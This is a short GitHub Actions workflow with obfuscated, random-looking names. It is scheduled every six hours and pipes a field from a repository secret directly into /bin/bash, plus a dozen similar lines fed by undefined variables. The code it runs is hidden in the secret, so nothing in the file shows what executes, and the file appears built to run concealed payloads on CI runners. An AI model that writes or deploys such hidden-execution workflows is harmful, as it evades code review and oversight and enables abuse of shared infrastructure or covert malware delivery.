name: shenjushou7610

on:
  workflow_dispatch:
  schedule:
    - cron: '46 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shenjushou7610
        env:
          onlv000: ${{ secrets.onlv000 }}
        run: |
          echo $onlv000 | jq -r .iwv56230 | /bin/bash
          echo $hsac8855 | jq -r .ggsdr9610 | /bin/bash
          echo $jv99 | jq -r .jmqo169 | /bin/bash
          echo $vh8902 | jq -r .jmw4 | /bin/bash
          echo $fjdx17 | jq -r .zt90761 | /bin/bash
          echo $fnpd5 | jq -r .vagwc76520 | /bin/bash
          echo $rnkai0550 | jq -r .qtsk287 | /bin/bash
          echo $fo1794 | jq -r .wi1923 | /bin/bash
          echo $ax3273 | jq -r .otn7 | /bin/bash
          echo $ad0 | jq -r .wvfi07649 | /bin/bash
          echo $r7 | jq -r .f78 | /bin/bash
          echo $m3523 | jq -r .fnpe66213 | /bin/bash

